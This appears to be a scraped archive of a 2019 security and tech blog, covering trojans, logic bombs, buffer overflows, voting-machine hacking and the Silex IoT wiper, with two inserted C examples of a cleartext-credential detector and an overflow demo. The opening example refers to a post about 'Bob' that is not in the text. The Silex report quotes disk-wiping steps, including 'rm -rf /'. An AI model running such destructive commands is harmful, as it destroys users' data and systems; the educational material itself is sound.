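As an added example, not part of the original post: the check below is the kind of rule a defender's network monitor runs over captured payloads to flag credentials that travel in cleartext, which is exactly the condition that let Bob's remote-connection login be read by someone on the same access point. The sample payloads, the host intranet.example and the bob/hunter2 credential are constructed; HTTP Basic authentication and FTP are assumptions, since the post does not say which remote connection service Bob used. The TLS sample shows the mitigation: over an encrypted channel the same login is opaque to anyone sharing the Wi-Fi, so the rule (and a sniffer) finds nothing.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Returns a label for a credential found in cleartext in one TCP payload, or
   NULL when nothing readable is present. A network sensor applies this rule
   to alert on logins that must be moved behind TLS or a VPN; a sniffer on a
   shared access point has the same visibility, which is the whole problem. */
const char *cleartext_credential(const uint8_t *payload, size_t len) {
    char buf[512];
    /* Work on a NUL-terminated copy so the string functions never read past
       the payload; an oversized payload is simply truncated for the check. */
    if (len >= sizeof buf) len = sizeof buf - 1;
    memcpy(buf, payload, len);
    buf[len] = '\0';

    /* HTTP Basic authentication: base64 is an encoding, not encryption, so
       the username and password are recoverable by anyone who sees it. */
    if (strstr(buf, "Authorization: Basic ") != NULL)
        return "http-basic-auth";

    /* FTP sends the password as a plain PASS command, either at the start of
       the payload or after a preceding command line. */
    if (strncmp(buf, "PASS ", 5) == 0 || strstr(buf, "\r\nPASS ") != NULL)
        return "ftp-pass";

    return NULL;
}

/* Constructed samples (not captured traffic). */
static const char SAMPLE_HTTP[] =
    "GET /accounts/report.xlsx HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "Authorization: Basic Ym9iOmh1bnRlcjI=\r\n\r\n";   /* "bob:hunter2" */
static const char SAMPLE_FTP[] = "USER bob\r\nPASS hunter2\r\n";
/* Start of a TLS application-data record: the login inside is encrypted, so
   these bytes carry nothing the rule can read. */
static const uint8_t SAMPLE_TLS[] = {
    0x17, 0x03, 0x03, 0x00, 0x20, 0x9c, 0x11, 0x7e, 0x00, 0x41 };

/* Counts how many of the three samples expose a credential. */
int count_exposed(void) {
    int n = 0;
    if (cleartext_credential((const uint8_t *)SAMPLE_HTTP, sizeof SAMPLE_HTTP - 1)) n++;
    if (cleartext_credential((const uint8_t *)SAMPLE_FTP, sizeof SAMPLE_FTP - 1)) n++;
    if (cleartext_credential(SAMPLE_TLS, sizeof SAMPLE_TLS)) n++;
    return n;   /* 2: the two cleartext protocols, not the TLS record */
}

int main(void) {
    printf("samples exposing a credential: %d of 3\n", count_exposed());
    return 0;
}
```

The useful lesson is in the third sample: nothing about the hotel network changed, only the protocol did, and the login stopped being readable. That is why the practical defence for Bob is an encrypted remote-access channel, not trying to find the sniffer, which, as the post says, causes no disruption that could be noticed.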


19 July, 2019

7 Necessary Apps for Every Entrepreneur

Everyone today has their favourite mobile apps, which make their private and business lives easier. But are there must-have apps for entrepreneurs and promoters of start-ups? For start-up entrepreneurs, finding the apps that make a difference to your company and to yourself is essential. Many of the pioneers in this field are already specialists. Heck, apps are nowadays the business of many start-ups. However, start-ups may not be so skilled in other areas. You do not need a boot app (most business apps are likely suitable), but your primary concern should be apps that give a small company big-company capabilities. Here are some of my favourite apps which are especially suitable for beginners. Most of them you may already know and use, but likely not all:

1. Square:

The famous Square gives beginners and businesspeople the ability to accept credit cards on their devices. The Square Card Reader basically transforms your smartphone into a portable cash register, which is of particular benefit to advisors, truck drivers (an up-and-coming start-up sector) and even certain traditional distributors. The reader accepts Visa, MasterCard, Discover and American Express. The fee is 2.75% per swipe. Perhaps most important, there are no extra monthly charges or setup expenses to create a merchant account, something that is nearly impossible for start-ups to do otherwise.

2. Bump Pay:


3. Dropbox:

Every start-up employee has been caught at some stage needing access to a file on their desktop that is nowhere to be seen. Dropbox, the popular and easy-to-use cloud-based storage and sharing service, is still the best way to tackle this problem. Once Dropbox is installed on your desktop, you just drag and drop small or large documents or videos into your Dropbox folder, and you can then retrieve them from any desktop and from your smartphone. (Microsoft and Google have launched comparable services lately.) Start with the free version. If you need extra storage, you can upgrade to a paid plan later.

4. QuickOffice:

QuickOffice is a suite of apps for handling Microsoft Office documents on Android, iPad, iPhone and Symbian. It remains to be seen what effect its recent takeover by Google will have on the product, although most specialists agree that the association gives both firms an advantage in the mobile industry. Check the plan options on the website, and then, wherever you are, you can create and edit files on your mobile.

5. FatStax:

FatStax 2.0 for iPad is an app that lets customers browse and view documents, including PDFs, PowerPoint slides and video, if you need a mobile sales app. The app also works offline, so during your sales meeting you do not have to worry about finding a wireless connection.

6. Skype:

Most techies know Skype (and probably use it). But have you loaded the Skype mobile app? Excellent for conference calls; just don't leave it running when you aren't using it (it eats battery and bandwidth).

7. Ego:

If you want to check the statistics for your site, check out Ego. Ego lets you view visits quickly by day, by month, or even by hour. You can also see, in one place, how many people are following you on Twitter and more.


17 July, 2019

Self-Driving Cars Can Be the Next Biggest Business. This is How It Is Possible

The first Back to the Future film was released 30 years ago. I recently watched it and was amazed at the changes in vehicles over the years. The film gives you a glimpse of a future with flying cars in 2015. How can vehicles not have made a material difference to our lives since 1985? I am confident that all vehicles will be self-driving 30 years from today and that most of them will be in 10 years. We overestimate our achievements in a year and underestimate our achievements in a century. Think about it: in 2007, Apple reinvented the phone with just one screen in your hand, while Google ensured that the operating system was virtually free and accessible to the masses. These technologies were crucial and life-changing. Now is the time to reinvent the car experience. It's an interesting moment for the technology giants as well as for start-ups and other technology companies, as they duke it out in this fresh platform holy war.

The long-term advantages of self-driving cars range from environmental, safety, health and family-life balance benefits to geopolitical and general financial ones. The safety advantages will probably be material, because fewer accidents will occur. A reduction in traffic accidents and, in turn, in pollution would benefit the environment. There are significant financial advantages, possibly as deflationary as Amazon Web Services today or the fall of the Berlin Wall in 1989. We can be less dependent on the oil industry if we spend less on fuel and maintenance. From a geopolitical point of view, this could mean less competition over resources.

Self-driving cars can also help to reduce inflation, because we would likely spend less on fuel and repairs. They can also have an impact on mobility. We would be better able to commute from cheaper areas of the city to our jobs, as traffic accidents would be fewer and less time would be wasted travelling to work or school. Self-driving cars can be the ultimate time creator, with direct and indirect advantages. They can give us more time to work, to sleep or to spend with our families. The outcome is a healthier, more balanced and happier life. Anyone who does not agree should try driving in rush hour in Los Angeles. Self-driving cars could be like adding hours to our day, because we would be able to work in our vehicles on a journey. The idea of productivity on the road could affect other areas of life too. We could use the time to study, which resonates with me personally because I have always thought that education can solve almost all of the world's problems. With so many benefits at stake, it seems a certainty that we will see a start-up software rush in time. It is probable that companies will create the hottest car operating system and applications for it.

Yes, there are dangers to self-driving cars, but they are no higher than those we face every time we get behind the wheel. In fact, many suggest that our risk of harm will be reduced. It is now estimated that 94% of car accidents are caused by human error. While autonomous cars may not yet be perfect (in reality, they are still evidently evolving and massively untested), they have huge potential to save countless lives. We have already seen improvements: in its self-driving efforts, Google has worked hard to minimise accidents. As automated software algorithms and artificial intelligence systems progress, this margin of error will become even lower.

Google and Apple are obviously competing with Tesla for automotive engineering talent in order to lead the future automotive operating system. This fresh platform holy war will lead to significant savagery, but rivalry will lead to innovation. In other words, we may only see the sector finally hit the accelerator after so many stops and starts.


15 July, 2019

Hacking voting machines

Person 1: Hi! Did you vote in this election?
Person 2: Oh! Yes. I did vote this time.
Person 1: I wonder which party is going to win in this election.
Person 2: Wait a second. There is news on the TV regarding the elections. Could you turn the volume on the TV up, please?
Person 1: Sure. I wonder what it is about.
TV news: It has just been reported that the recent political elections had been rigged by cybercriminals. The government has decided to cancel the result calculation and has declared that there will have to be another round of elections.
Person 1: Oh my god! I hate those hackers.
Person 2: Me too!

Rigging political elections has been the motive of several bad actors in the past and continues to be so to date. Earlier, when elections were held by people putting their votes into a ballot box in the form of a slip, those who wanted to rig the polls hired some muscle to capture ballot boxes and stuff them with bogus votes in favour of the party they supported. Such activities produced biased election results. Nowadays, there is no more paper-based voting. People cast their votes using high-tech electronic voting machines. These machines have buttons on them, and each button corresponds to a specific political party. To cast their vote, people just need to go to the polling station and press the button that corresponds to their party of choice. This is one particular type of voting machine. There are voting machines available that have a built-in wireless local area network, and as they say, if something emits a signal, then it can be hacked; therefore, it is no surprise that these machines can actually be hacked. Well, it is partially a surprise, because these machines are used in one of the most important events for a country, and yet they are vulnerable to cyber attacks. This blog discusses how cybercriminals use various tools, tactics and techniques to hack into an electronic voting machine, and what impact this can have on a country, which by the way is a pretty big target.

Many countries use what is called a Direct Recording Electronic voting machine for citizens to cast their votes during the political elections held in the country. These voting machines have a touch screen display, a printer, a built-in wireless local area network, a modem, and battery backup. They come installed with election management software, and some even with software that allows election officials to completely control everything about the election programming process. Most of these voting machines are based on Windows XP, which makes them even more vulnerable to hacking. An example of an attack that can be performed on such a voting machine is as follows. As the machines are Windows XP based, a threat actor could easily find an exploit for the machine. Let's say that a hacker discovers that the Remote Desktop Protocol port is open on the voting machine. Finding this tempting entry point, the attacker begins their exploit. The attacker uses a certain hacking tool and manages to gain access to the machine. Now, the adversary can access all the election data stored on the target machine. They could choose to either alter or destroy all of it. Whatever they decide to do would cause a lot of damage to the victim country. For example, if they choose to destroy all the data, then all the work the country's election officials have done goes to waste, and so does all the money put into the election process. The victim country would suffer a significant financial loss. It could also cause conflicts between the participating political parties, as they may think that one or more of their opposing parties did it because they were afraid of losing the election. All in all, hacked voting machines are not a good thing for a country, as they only result in losses or in people fighting among themselves.

The vendors who manufacture voting machines need to up their security game if a country wants to be free from, or at least feel safer against, election hacking.


6 July, 2019

That horse bites

Horses are majestic animals, and they can be a very good friend to a human being. Well, this is true only of real horses and not of the ones talked about in this blog. This blog discusses what trojan horses are and how they can be, and are being, used by cybercriminals to attack their target victims and cause massive damage to them.

Malware is malicious software that is programmed by hackers to perform malicious activities on the computer systems it infects. Malicious software comes in several types and can be used to perform different kinds of tasks. One such type of malicious software is a trojan horse. Do not be deceived by the name: it is not a real horse. It is a type of malicious software that is coded by threat actors to pose as legitimate, trusted software. Attackers insert malicious code into legitimate software and send it to their victims. The trojan horse could be wrapped inside a simple-looking application, such as a calculator, or it could be hidden under the hood of a video game that a person downloads from an unknown website. Attackers use different techniques to spread trojan horses across the internet: email attachments, email hyperlinks, or even malicious websites deliver the trojan horse to their victims. It is also known that nowadays not even the online mobile app stores are safe from hackers uploading trojan horses to them. This puts hundreds of millions of people in a lot of danger, because almost everyone uses email these days and tends to open any attachment without even wondering about the source of the email, and almost everyone uses a smartphone as well, on which they download various apps for their personal or official tasks, entertainment, and so on. Imagine so many people downloading software which they think is legitimate, which operates as if it were legitimate, but which, behind the scenes, performs malicious activities that put the data or privacy of the victims in jeopardy.

Trojan horses come in various flavours and perform different functions. Some of them are the security-software-disabling trojan, the proxy trojan, the denial-of-service trojan, the data-sending trojan, the FTP trojan, the destructive trojan and the remote access trojan (RAT). The security-software-disabling trojan disables any security software installed on a computer system, such as antivirus, which makes the threat actors' job easier. A proxy trojan turns a victim's computer system into a proxy server, which a hacker can use for their malicious activities and to attack other computer systems. The final victim computer will see the attack as coming from the computer infected by the proxy trojan and not from the hacker's actual computer system. A denial-of-service trojan enables an adversary to perform denial-of-service (DoS) attacks through the infected computer. A data-sending trojan incorporates a keylogger that captures all the sensitive information entered into the victim computer and then sends the captured data to the threat actor. An FTP trojan allows the attackers to connect to the infected computer system over port 21 using the FTP protocol. A destructive trojan is used by cybercriminals to destroy data stored on the victim's computer. A remote access trojan usually poses as a legitimate system utility, and threat actors use it to fully control the infected computer system.

Let us take an example of a remote access trojan. Let's say that a person wants to clear unwanted files from their computer's hard drive, and to do this they search the internet for a utility that could help them. They find legitimate-looking software on a website they had not visited before. They download it and install it on their computer, hoping that it will help them solve their issue. Now, the utility does do what they thought it would, but underneath the good looks of a clutter-removing tool, it also gives full remote access to the attackers who planted the trojan horse on the website from which the victim downloaded the software. In this way, the person who downloaded the software became the victim of a remote access trojan attack, and they have no idea what the attacker is capable of doing with their computer.


5 July, 2019

The entertainment and media industry being targeted? Seriously?

Who doesn't like to watch their favourite TV shows and movies without any disruptions? Who doesn't hate it when there is a movie you are so eagerly waiting to see at the cinema, but one of your friends comes in and gives you spoilers about it, just because they had already watched the film before its actual release? Spoils the fun, doesn't it? Well, these are a few of the things that concern the people who work hard to bring entertainment or the news to you. This blog talks about how cyber threats affect the entertainment and media industry, and what impact those threats could have on it.

People like getting a sneak peek of something, but a whole movie getting leaked is nothing to be happy about, because if people are happy with all the leaks, it gives hackers the motivation to keep pursuing their malicious activities. Imagine the amount of damage it causes to the people who were part of the movie that got leaked. All their hard work turns to digital dust when something like this happens. This is because if the film does not make that much money, then they won't get paid enough, and the people behind the creation of the movie would not get enough money to cover all the expenses incurred in making the movie in the first place.

Many hackers are paid by organisations to steal information from their competitors. The stolen data could concern distribution, the technology used for production, or the company's intellectual property. Insider threat is also one of the biggest concerns for entertainment companies, as a lot of people tend to have access to the produced films during the post-production phase. Some attackers do not want to steal any information but instead cause destruction and chaos. They use techniques to hack into an entertainment company's network, for example the network of the studio where a film is in post-production, and destroy all the media contained in the computer systems, or the computer systems themselves.

The entertainment and media industry being targeted is exceptionally alarming, as not many companies in it have yet started implementing cyber security mechanisms. The targets in this industry are very high-profile, which tends to lure attackers towards them, and hence there is a great need for the companies operating in this industry to secure their assets against cybercrime.


4 July, 2019

Cyber security in supply chains

When people think of cyber security, they think of something concerned with safeguarding computer systems and the information they hold. Well, those who think this is what cyber security is about are correct. For those who did not know what it was, or is, you can first try reading and understanding the first line of this blog again. The concept of cyber security has been known and implemented for a long time now. However, there are a lot of ways in which it can be used that have not yet gained much popularity. This blog talks about the benefits of cyber security in supply chains and also discusses some of the threats that can be mitigated by implementing cyber security in the world of supply chains.

A supply chain is the transfer of services or products from one entity to another. The passage of the service or product usually runs from the supplier of raw materials to intermediate or component manufacturers, and then on to assemblers or the manufacturers of the final product. From these assemblers and manufacturers, the service or product is supplied to distributors and wholesalers, who then provide it to retailers. The retailers finally deliver the service or product to the customers. In between all the supplying, there are a lot of storage and transportation activities involved, and all these supply chain activities are connected to each other with the help of planning, information and integration.

Let us take the example of a tangible product, say a smartphone. The components that make up the smartphone are manufactured by several different vendors, who send these components to a single place where they are put together to build the smartphone in question. The smartphone is then sent to distributors, who provide it to the retailers, and the retailers finally sell the smartphone to the customers. During the processes of manufacturing components, assembling the smartphone, bringing it to retail stores, and selling it to customers, there are several touch points through which the "product" passes. The product even gets into the hands of the people who transport it from one place to another. Now, imagine if, at one or more of these touch points, someone decides to do something malicious to the product. What if someone decides to sabotage it? Attackers could go to extreme lengths and use various methods to attack their victims and cause severe damage to them. For example, threat actors could impersonate someone at the plant where smartphones are assembled, and use that opportunity to insert an extra computer chip onto the motherboard of all or some of the smartphones, or fully replace a particular component, which would later be of advantage to the attackers. The attackers could also have been paid by a rival company to perform this sabotage so that the victim company would not be able to complete its operations successfully.

There have been cases where computer hardware was delivered with malicious software already installed on it, cases where vulnerabilities were discovered in the software applications used within the supply chain, and cases of source code manipulation. All this calls for cyber security in the supply chain, as it deals with the protection of IT systems, networks and software that can be affected by various types of cyber threats, such as malware, information theft, and so on. Organisations should incorporate cyber security mechanisms into their supply chains. To lower the security risks, organisations could try to buy only from vendors that are fully trusted, and they could also try protecting all their critical systems by isolating them from external networks.

Cyber security in supply chains should be taken seriously if organisations want to keep cyber threats from affecting them and their customers. Various standards have been created by many authorities for organisations to use in putting appropriate countermeasures in place.


3 July, 2019

Logic bombs

Bob: It is 6 AM. I should get up.

Alice: It is 6 PM. I should head to the gym. I have a group class that I have to attend.

Human beings use time to remember what task they should be doing next. They do things depending on one condition or another. Well, we all know that in this century, even inanimate things can do the same. Hah! Touche! We are not talking about robots here. This blog talks about a specific type of malware called a logic bomb and what impact it can have on its target victims.

The word malware is made up of two words, malicious and software. From this, we can infer that malware is malicious software coded by hackers to perform malicious activities on the computer system it infects. Adversaries can program malicious software according to what they want it to do, and then use several different techniques to spread it into multiple computer networks and onto target computer systems. A logic bomb is a special type of malicious software that most people are unaware of. It is malware programmed by threat actors to infect target computer systems and then start performing some malicious function when a very specific condition is met. The particular condition on which the logic bomb's execution depends is called the trigger of the logic bomb. Many people also refer to a logic bomb as slag code. Attackers use logic bombs in several different situations, such as when they want to destroy their target systems on a particular date, at a specific time, or when some other type of event occurs on the target computer system. An example of a logic bomb attack is the one that wiped the Master Boot Records and hard drives of two media organisations and three banks simultaneously. This attack took place in an Asian country, and sadly, about 30,000 computer systems were compromised by the attackers. The logic bomb started wiping when the clock struck 2:01 PM on the day of the attack.

Logic bombs usually sit on the target systems silently until they are executed, and when they are, it is mayday for the victims. Logic bombs can be created for any computer operating system. Even mobile phone operating systems have not been left alone by cybercriminals. Mobile phones are used widely around the world, and if the operating systems on those devices are not immune to logic-bomb-like malicious software, then one can only imagine the amount of damage threat actors can cause to the victims who fall prey to such an attack. It is not just individuals that are affected; organisations also face a lot of danger from infected smartphones or other types of mobile devices.

Nowadays, a lot of organisations follow a BYOD, or Bring Your Own Device, policy, which allows the employees of the organisation to bring and use their personal devices inside the organisation's premises. People use those devices for both private and work purposes. If these devices are infected with a logic bomb, and the attackers program the malware to spread from the employees' devices onto the organisation's network and then infect all the other computer systems present in the network, the organisation could face a lot of trouble. For example, let us say the logic bomb somehow manages to infect all the computer systems in the accounts department. The attackers could then make the logic bomb detonate on a very special day, such as one when a lot of financial transactions are to be made, and damage the systems. This could cause a lot of losses because, for example, the systems may not be able to record the transactions, and money may get lost due to the systems working improperly.

Logic bombs have caused several disasters in the past and can be very scary. They are used a lot by state-sponsored hackers and Advanced Persistent Threats. People should be aware of this kind of malware so that they can put the appropriate security measures in place to protect against a logic bomb attack.


2 July, 2019

Buffer overflow attacks

Vulnerabilities can be present in anything, and hackers can take advantage of them using several different methods to cause damage to their victims and for their personal benefit. Even human beings have vulnerabilities that cybercriminals can exploit to perform a social engineering attack on them and elicit sensitive information, which the attackers can then use for other malicious purposes. This blog talks about a particular vulnerability, the buffer overflow vulnerability, which could be present in any information asset built from computer code, and how attackers use this vulnerability to attack their victims. The blog also discusses the impact an attacker can cause using this kind of cyber attack.

In the world of computers, a buffer is a region of memory used to store data temporarily while it is being transferred from one location to another. Buffers are usually used wherever the read and write rates of data differ. A buffer overflow occurs when the data being written into a buffer is bigger than the buffer itself. The data spills past the boundaries of the buffer, so the excess gets written into memory locations beyond the last address of the buffer being overflowed. Those locations may already hold data, which gets overwritten, or the overflowing data may cause arbitrary computer code to be executed.

Cybercriminals take advantage of this vulnerability by supplying more data than the buffer is able to hold and then causing the system to execute arbitrary malicious code, which makes the system behave in unintended ways. Many times, the malicious code simply makes the system crash, which leads to a Denial-of-Service. A lot of software applications out there are vulnerable to buffer overflow attacks. Even web applications used by millions of users worldwide have this vulnerability. Developers who do not take proper care while writing source code end up introducing this type of weakness into systems and software. Many of the major operating systems themselves have had buffer overflow vulnerabilities, which have been the cause of colossal security breaches. Threat actors use various techniques to send carefully crafted data to web applications and make the application execute their malicious code. A buffer overflow attack is so powerful that it can allow hackers to take total control of the web server hosting the vulnerable web application. It can enable attackers to take control of a process' execution or crash the process altogether. Another purpose served by this kind of attack is that it allows adversaries to alter internal variables. There are two main types of buffer overflow attacks, namely heap-based and stack-based buffer overflows. The idea behind both is similar, but in a heap-based buffer overflow the buffer is allocated on the heap, whereas in a stack-based buffer overflow the buffer is allocated on the stack.
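As an added illustration (not code from the original post), here is a small C model of the "alter internal variables" effect described above: an unbounded copy into a 16-byte buffer spills into the variable that sits right after it, while a bounded copy rejects the oversized input. The frame layout, field names and inputs are constructed for the demo; the same principle applies to a buffer allocated on the heap.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a stack frame for this demo: a fixed-size input
 * buffer immediately followed by an internal variable.  On a real stack
 * (or heap chunk) the compiler or allocator decides the layout, but the
 * principle is the same: whatever lies past the end of the buffer is
 * overwritten by the excess bytes. */
#define BUF_SIZE 16

struct frame {
    char     buf[BUF_SIZE];   /* the buffer being written into            */
    uint32_t authorised;      /* internal variable sitting right after it */
};

/* VULNERABLE: strcpy-style copy that stops only at the terminating NUL and
 * never consults BUF_SIZE.  It writes through the raw bytes of the frame so
 * that the overflow lands on the neighbouring variable.  The guard on
 * sizeof *f exists only to keep this demo well-defined; a real strcpy()
 * has no bound at all and keeps writing past the frame. */
static void unsafe_store(struct frame *f, const char *input)
{
    unsigned char *mem = (unsigned char *)f;
    size_t i = 0;
    while (input[i] != '\0' && i < sizeof *f) {
        mem[i] = (unsigned char)input[i];
        i++;
    }
    if (i < sizeof *f)
        mem[i] = '\0';
}

/* HARDENED: measure the input first and refuse anything that does not fit
 * in the buffer together with its NUL terminator. */
static int safe_store(struct frame *f, const char *input)
{
    size_t n = strlen(input);
    if (n >= BUF_SIZE)
        return -1;            /* rejected: would overflow buf */
    memcpy(f->buf, input, n + 1);
    return 0;
}

/* Value of the neighbouring variable after the unbounded copy.  Any input
 * longer than BUF_SIZE clobbers it with attacker-controlled bytes, e.g. 20
 * bytes of 'A' leave it as 0x41414141: non-zero, so "authorised". */
uint32_t flag_after_unsafe(const char *input)
{
    struct frame f;
    memset(&f, 0, sizeof f);  /* authorised == 0: not authorised */
    unsafe_store(&f, input);
    return f.authorised;
}

/* 1 if the bounded copy accepted the input, 0 if it rejected it. */
int safe_accepts(const char *input)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    return safe_store(&f, input) == 0;
}

/* Value of the neighbouring variable after the bounded copy: always 0 here,
 * whether the input was accepted or rejected. */
uint32_t flag_after_safe(const char *input)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    (void)safe_store(&f, input);
    return f.authorised;
}

int main(void)
{
    /* constructed inputs: one that fits, one that is 20 bytes long */
    const char *ok_input   = "hello";
    const char *long_input = "AAAAAAAAAAAAAAAAAAAA";

    printf("unbounded copy, \"%s\": authorised = 0x%08" PRIx32 "\n",
           ok_input, flag_after_unsafe(ok_input));
    printf("unbounded copy, 20 x 'A': authorised = 0x%08" PRIx32 "\n",
           flag_after_unsafe(long_input));
    printf("bounded copy,   20 x 'A': accepted = %d, authorised = 0x%08" PRIx32 "\n",
           safe_accepts(long_input), flag_after_safe(long_input));
    return 0;
}
```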

The libraries used by many web applications also tend to put them at risk of a buffer overflow attack. There have been a lot of cases in the past where the cause of a cyber attack was a buffer overflow vulnerability, and every day there is news of a new buffer overflow vulnerability being discovered in one product or another. An example of a buffer overflow flaw is the Devil's Ivy vulnerability, which affected millions of Internet-of-Things (IoT) devices in 2017. It could be exploited remotely by sending a large XML file to the vulnerable system.

Similarly, there are vast numbers of buffer overflow vulnerabilities out there that adversaries can easily exploit to cause damage to their targets. Measures should be put in place to prevent such flaws from occurring in systems, and to protect victims from falling prey to cybercriminals.

Read More

1

July, 2019

SILEX Malware

14-year-old creates dangerous malware, starts bricking thousands of IoT devices:

In a couple of hours, over 2,000 units were bricked, and the attacks remain in progress. A new malware strain named Silex is bricking thousands of IoT devices. A 14-year-old teenager known by the pseudonym Light Leafon has created this malware. ...
The strain is inspired by BrickerBot, the infamous malware that killed millions of IoT devices back in 2017. The malware has succeeded in bricking up to 2,000 devices in one hour. Silex logs in using default IoT credentials, trashes the device's storage, drops the firewall rules and wipes the network configuration. Once in, it lists all mounted drives, overwrites them with data from /dev/random, deletes the firewall rules, removes the network configuration and reboots the device; it targets any Unix-like system with default credentials. This bricks the device efficiently and leaves it useless until someone performs the complicated dance required to download and reinstall the device's firmware. Since it first appeared earlier today, the worm has taken down at least 2,000 devices, and it is indiscriminate enough to also wipe misconfigured GNU/Linux servers. At least some of the attacks have been served from novinvps.com, located in Iran. Ankit Anubhav of NewSky Security tells ZDNet that he has made contact with Light Leafon, the author of the worm, who claims to be 14 years old. Light Leafon said he started the malware as a joke and has now turned it into a full-time undertaking, as he told Ankit Anubhav, a NewSky Security analyst. Leafon has said he will continue to develop the malware, making it increasingly dangerous, with the functionality of the original BrickerBot. His plans include adding the ability for the malware to log into devices over SSH, and adding exploits so that it can get into IoT devices by abusing their vulnerabilities. Especially surprising is the understanding and ability a 14-year-old teenager has shown in bricking equipment. However, researchers say that he has made a few OpSec blunders that could allow investigators to catch him.

HOW THE SILEX MALWARE WORKS:

Silex works by trashing the IoT device's storage, dropping the firewall rules, removing the network configuration and then halting the device, according to Akamai researcher Larry Cashdollar, who first found the malware today. It is as damaging as it can get without frying the device's circuits. Victims must reinstall the device's firmware manually, a task too complex for most device owners. Some owners are most likely to throw the equipment away, believing they had a hardware failure, without realising that malware hit them. Cashdollar told ZDNet today in an email that it uses known default IoT device credentials to log in and destroy the system. This is done by writing random data from /dev/random to any mounted storage it discovers. "I see that fdisk -l is called in the binary, which lists all disk partitions," added Cashdollar. "It then writes random data from /dev/random to all the partitions it finds. It deletes the network settings and [ ... ] it also deletes anything it misses by running rm -rf /."

Attacks Carried Out From An Iranian Server:

"The system I have captured is aimed at every Unix-like system with default login credentials," Cashdollar said. "I also found that there was a downloadable Bash shell version that aims at any Unix-like architecture or OS." This also implies that if Linux servers are exposed and secured with bad or widely used credentials, Silex will trash them. Cashdollar said that when they were looking into the source of these attacks, "the IP address that targeted my honeypot is hosted on a VPS server owned by novinvps.com, operated from Iran."

As IoT malware researcher Rohit Bansal has stated, the IP address has already been added to the URLhaus blacklist.

Read More

29

June, 2019

Importance of security in the education industry

In a world where cybercriminals are leaving no opportunity to attack their targets and are making sure they get a piece of every single industry out there in the world, there is one particular industry regarding which many ...
people think that even if hackers managed to steal its data, what would they do with it? The industry being talked about is the education industry, and for those gentlemen and gentleladies who do not know, there is more to educational records than just grades and points. Educational records also contain personally identifiable information, which, if stolen, could lead to a lot of problems for the victims. This blog talks about what educational records entail and how important it is for authorities to secure these records from adversaries. But before we start, let us first see what personally identifiable information really is and why it is so necessary to secure it from threat actors.

Personally identifiable information, or PII, is information about a person that allows another person or an organisation to clearly identify the person to whom the data belongs. Examples of personally identifiable information are name, birthdate, ID numbers, etc. Attackers can steal this information and use it for malicious purposes, such as identity theft or social engineering attacks, or they could sell it on the dark web to the highest bidder, who would then use it to their own advantage.

Educational records also contain personally identifiable information, and if these records are stolen, then so is the PII in them. Educational records are created and stored by educational institutions, such as universities, colleges, schools, etc., to keep track of the students who are or previously were enrolled with the institution. They use the records for institutional purposes, and sometimes to provide statistics to other organisations. Another reason for educational institutions to maintain records is that many of their students ask the institution for a record of their academic profile so that they can send it to other institutions, such as a higher education institute. Students send their mark sheets, which would be impossible to obtain if institutions did not maintain educational records. However, storing and maintaining hundreds of thousands of educational records can be a hassle for institutions, and as the information is digitised these days, it becomes vulnerable to disclosure, alteration or destruction by cybercriminals. The systems that store these records are not necessarily well protected, because institutions assume nobody would bother attacking an educational institution. This thinking has caused significant security breaches in the past, which should make institutions roll up their sleeves and implement robust security controls to safeguard their information systems. One security breach involved the theft of the personal data of 15,000 students, which the attackers later posted on a forum website.

Let us consider another example. Imagine cybercriminals using malware, such as ransomware, to attack the information systems of educational institutions. The ransomware could infect the systems and then encrypt each and every piece of information on them, which may or may not be recoverable after the attack. This would have a massive impact on the victims. The institution would not be able to see its student records and would not know how any of its students were performing, and the students themselves would not know their own academic results either. This could create chaos at the institution. Now, if one such attack on one institution can cause so much trouble, then we can only imagine the consequences of a vast number of institutions being attacked.

Many countries have laws in place that protect educational records from unauthorised disclosure, alteration or destruction. One such law is the Family Educational Rights and Privacy Act of 1974. It controls access to educational records by entities other than the institution that stores and maintains them. There should be more focus on the security of the information systems that hold educational information and on how this kind of information is handled by the various entities involved.

Read More

28

June, 2019

Indian Smartphone Choices

Smartphones have become an essential element of today's world, and India is the world's fastest growing smartphone market, which will not slow down anytime soon. ...
The trend of cheap mobile data and unlimited voice calling has made people so addicted to smartphones that life without them is hard to imagine.

To gain more insight into the industry, 91mobiles conducted a survey with a sample of over 15,000 users that revealed some key facts and statistics. The Smartphone Buyer Insights Survey 2019 asked Indian users from all walks of life how often they change their phones, their preferred price range and their preferred buying platforms. In today's Indian market, bigger brands like Samsung and iPhone have to compete with newer brands that offer killer specs at a competitive price.

3 out of every 5 smartphone users, mostly working men, have an upgrade cycle of less than 12 months, with 80% likely to buy a new phone in 2019. Women change smartphones slightly less frequently, with a 4:3 male to female breakdown. Unsurprisingly, younger users upgraded their phones more frequently than those over 35. In terms of pricing, most sales were seen in the 10-20k INR segment, which is also the segment where we have seen the most competitive devices from brands like Redmi, Realme and others. Women were found to prefer cheaper phones, while men were seen opting for more expensive devices. Users under the age of 35 were more likely to prefer phones in the budget segment below 20k.

Talking about the actual purchase process, some 80 percent of users prefer to research their next smartphone online, regardless of whether they go ahead with the transaction there. Tech sites were the most preferred source of information, followed by e-commerce sites, by a huge margin. Women are more likely to buy phones online than offline. While sales in the online segment are increasing, given the option of buying the device either online or offline, if the offline price is 1,000 more than online, 3 out of 5 users will prefer the cheaper online option.

As for phone preferences, most users would prefer an all-rounder, with performance and camera taking the top spots. Interestingly, most men would want their phone to be more powerful, while women prioritised camera and battery performance. Specific camera data reveals how Indians perceive camera performance based on specifications. Men would prefer a camera with a larger aperture, while women would focus on front cameras. Younger users were more concerned about the number of cameras, while those above 35 wanted higher resolution sensors. As expected, most users would decide based on processor brand and RAM, while 11 percent of men also looked at benchmarks. For women, that figure fell to 6 percent.

Some of these facts are interesting and just go to show how dynamic the Indian market is. 91mobiles also expects these insights to help smartphone OEMs better tailor their Indian market offerings.

Read More

27

June, 2019

Views of people regarding security

It has been a while since we looked into what is currently going on in the world of security, and what our friends around the world are thinking regarding the cyber threats that are currently causing havoc everywhere. ...
This blog talks about what people or organisations believe are the biggest problems for them.

